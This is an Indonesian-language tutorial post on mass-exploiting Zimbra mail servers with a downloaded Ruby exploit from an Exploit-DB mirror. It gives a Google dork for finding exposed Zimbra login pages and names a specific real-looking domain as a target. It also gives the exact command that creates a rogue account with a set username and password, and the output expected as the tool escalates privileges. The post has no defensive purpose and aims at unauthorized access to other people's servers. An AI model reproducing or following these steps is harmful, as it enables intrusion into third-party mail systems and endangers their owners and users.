Oke ketemu lagi dengan saya GusTi ,
disini saya ajkan berbagi mengenai cara exploit zimbra untuk smtp ,
untuk penjelasannya langsung saja :
Wajib DownloadAplikasi ruby
Exploitd-DB mirror : Download
Langkah Installasi dan cara memperintahkan di cmd
- Instal ruby samapai selesai di program files c:\
- Download exploit db nya
- Setalah di download jang lupa extrak file nya di program file ruby
- ruby - bin; extrak di situ
- Buka cmd
- Jalan kan perintah nya
- "cd c:\ruby\bin" *tanpakutip
- ruby run.rb -t http://www.target.com
Untuk mencari target butuh dork zimbra, ane hanya ngasih 1 dork
inurl:"web client zimbra login"
Untuk dork lain silahkan mencari dan mengembangkan dork sendiri
Langkah mencari target :
- Buka google.com
- Masukkan dork diatas tadi kedalam google
- Contoh : http://tangguh.co.id/questions/linux-server-73/customize-zimbra-web-client-login-screen-in-v8-4175450789/
ambil website domainnya saja, http://tangguh.co.id - Copy dan Paste di cmd yang tadi sudah diberi perintah,
ruby run.rb -t mail.tangguh.co.id -u paypalsecure -p aa11AA11 - Kemudian liat hasilnya
Jika sukses ada notice sepeti ini di cmd
[*]Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
contoh gambar sukses :
